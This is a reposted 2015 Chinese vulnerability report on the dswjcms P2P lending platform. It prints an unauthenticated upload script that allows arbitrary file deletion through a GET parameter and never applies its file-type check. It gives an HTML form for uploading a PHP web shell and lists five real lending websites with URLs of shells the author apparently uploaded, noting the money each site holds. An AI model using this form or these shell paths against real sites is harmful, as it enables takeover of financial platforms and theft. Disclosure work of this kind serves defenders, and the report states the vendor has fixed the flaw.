记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某P2P网贷系统前台getshell与任意文件删除漏洞(可涉及大量资金安全)

2015-12-17 01:00
漏洞标题 某P2P网贷系统前台getshell与任意文件删除漏洞(可涉及大量资金安全)
相关厂商 dswjcms.com
漏洞作者 roker
提交时间 2015-09-17 12:33
公开时间 2015-12-16 19:54
漏洞类型 文件上传导致任意代码执行
危害等级
自评Rank 20
漏洞状态 厂商已经修复
Tags标签

漏洞详情

/www/Public/uploadify/uploadify.php

<?php
/*
uploadify 后台处理
*/

//设置上传目录
error_reporting( E_ALL & ~E_NOTICE & ~E_DEPRECATED );
$path = "uploads/".$_GET['folder']."/";
if($_GET['file_delete']){ //如果原先有图片就删除
if(file_exists('.'.$_GET['file_delete'])){ //存在图片
unlink('.'.$_GET['file_delete']); //删除它
}
}
if (!empty($_FILES)) {

//得到上传的临时文件流
$tempFile = $_FILES['Filedata']['tmp_name'];

//允许的文件后缀
$fileTypes = array('jpg','jpeg','gif','png');

//得到文件原名
$fileParts = pathinfo($_FILES['Filedata']['name']);
$ftype=$fileParts['extension'];
$fileName=microtime(true).".".$fileParts['extension']; //以微秒时间命名

//最后保存服务器地址
if(!is_dir($path))
mkdir($path);
if (move_uploaded_file($tempFile, $path.$fileName)){
echo $fileName;
}else{
echo $fileName.$_FILES['Filedata']['tmp_name']."上传失败!";
}
}
?>

没有权限设置 ,$fileTypes也没有看到调用。

提交$_GET['file_delete'] 即可任意文件删除。

本地构造表单

<form action="http://xxx/Public/uploadify/uploadify.php" method="post" enctype ="multipart/form-data" > 
<input id="File" name="Filedata" type="file" />
<input type="submit" name="Button1" value="Button" id="Button1" />
</form>

即可getshell。

漏洞证明:

案例 1:

http://www.pjzx123.com/

11.png

13亿。。不知道真的假的。。拒绝查水表- -

http://www.pjzx123.com/Public/uploadify/uploads/201509/1442254529.7142.php

案例2:

http://hm.bjdjyx.com/

33.png

几百万。

http://hm.bjdjyx.com//Public/uploadify/uploads/1442254710.5383.php

案例3:

http://www.yunzew.com/

22.png

10多万。

http://www.yunzew.com//Public/uploadify/uploads/1442254745.36.php

4:

http://www.aft-sunnyit.com//Public/uploadify/uploads/1442254784.43.php

5:

http://www.fangdaibao.cc/Public/uploadify/uploads/1442254831.3598.php

修复方案:

判断权限。检测后缀

版权声明:转载请注明来源 roker@乌云

知识来源: www.secpulse.com/archives/42012.html

阅读:79406 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某P2P网贷系统前台getshell与任意文件删除漏洞(可涉及大量资金安全)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云